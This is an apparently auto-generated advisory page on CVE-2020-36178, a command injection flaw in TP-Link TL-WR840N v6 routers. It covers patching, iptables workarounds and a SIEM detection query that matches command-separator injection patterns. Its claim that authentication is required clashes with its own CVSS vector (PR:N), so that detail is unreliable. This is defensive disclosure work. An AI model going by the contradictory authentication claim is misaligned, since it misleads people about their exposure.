CVE-2020-36178 – This CVE allows remote attackers to execute arb... (How to Fix)

Q: What is the severity of CVE-2020-36178?

CVE-2020-36178 has a CVSS score of 9.8 (CRITICAL). This CVE allows remote attackers to execute arbitrary operating system commands on TP-Link TL-WR840N routers by injecting malicious commands into an IP address field in the web interface. The vulnerability affects users of TP-Link TL-WR840N v6 routers with specific firmware versions. Attackers can gain full control of the device through command injection.

📋 TL;DR

This CVE allows remote attackers to execute arbitrary operating system commands on TP-Link TL-WR840N routers by injecting malicious commands into an IP address field in the web interface. The vulnerability affects users of TP-Link TL-WR840N v6 routers with specific firmware versions. Attackers can gain full control of the device through command injection.

💻 Affected Systems

Products:

TP-Link TL-WR840N

Versions: v6 with firmware 0.9.1 4.16 (EU version confirmed)

Operating Systems: Embedded Linux on TP-Link hardware

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the oal_ipt_addBridgeIsolationRules function but similar issues may exist in other functions calling util_execSystem. EU version specifically mentioned but other regional versions may be affected.

📦 What is this software?

Tl Wr840n Firmware by Tp Link

View all CVEs affecting Tl Wr840n Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the router allowing attackers to intercept all network traffic, install persistent malware, pivot to internal networks, and use the device as part of a botnet.

🟠

Likely Case

Router takeover enabling traffic interception, DNS hijacking, credential theft, and lateral movement to connected devices.

🟢

If Mitigated

Limited impact if web interface access is restricted and proper network segmentation is implemented.

🌐 Internet-Facing: HIGH - The web interface is typically accessible from WAN by default, making internet-facing devices directly exploitable.

🏢 Internal Only: MEDIUM - Internal attackers with network access can exploit the vulnerability if they reach the web interface.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires access to the web interface (typically requires authentication). The vulnerability is in a POST parameter that accepts raw input for iptables commands.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check TP-Link support for latest firmware

Vendor Advisory: https://www.tp-link.com/fr/support/download/tl-wr840n/v6/#Firmware

Restart Required: Yes

Instructions:

1. Log into TP-Link support portal. 2. Download latest firmware for TL-WR840N v6. 3. Access router web interface. 4. Navigate to System Tools > Firmware Upgrade. 5. Upload and install new firmware. 6. Router will reboot automatically.

🔧 Temporary Workarounds

Disable Remote Management

all

Prevent external access to the web interface by disabling remote management features.

Restrict Web Interface Access

linux

Use firewall rules to limit access to the router's web interface to trusted IP addresses only.

iptables -A INPUT -p tcp --dport 80 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

🧯 If You Can't Patch

Disable the web interface completely and use alternative management methods
Replace affected devices with patched or different models

🔍 How to Verify

Check if Vulnerable:

Check router firmware version in web interface under System Tools > Firmware Upgrade. If version is 0.9.1 4.16 or similar vulnerable version, device is affected.

Check Version:

Check web interface at System Tools > Firmware Upgrade or via SSH if available: cat /proc/version

Verify Fix Applied:

After firmware update, verify version has changed from vulnerable version. Test that input validation now properly sanitizes IP address fields.

📡 Detection & Monitoring

Log Indicators:

Unusual iptables commands in system logs
Multiple failed login attempts followed by successful login
Unexpected system command execution

Network Indicators:

Unusual outbound connections from router
DNS queries to suspicious domains
Unexpected port scans originating from router

SIEM Query:

source="router_logs" AND ("iptables" OR "system" OR "exec") AND command="*;*" OR command="*|*" OR command="*`*"

📊 Metadata

CVE ID: CVE-2020-36178

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-78

Published: January 6, 2021

Last Updated: November 21, 2024

🔗 References

https://github.com/therealunicornsecurity/therealunicornsecurity.github.io/blob/master/_posts/2020-10-11-TPLink.md Exploit,Third Party Advisory
https://therealunicornsecurity.github.io/TPLink/ Exploit,Third Party Advisory
https://www.tp-link.com/fr/support/download/tl-wr840n/v6/#Firmware Vendor Advisory
https://github.com/therealunicornsecurity/therealunicornsecurity.github.io/blob/master/_posts/2020-10-11-TPLink.md Exploit,Third Party Advisory
https://therealunicornsecurity.github.io/TPLink/ Exploit,Third Party Advisory
https://www.tp-link.com/fr/support/download/tl-wr840n/v6/#Firmware Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-36178, you might also want to check these: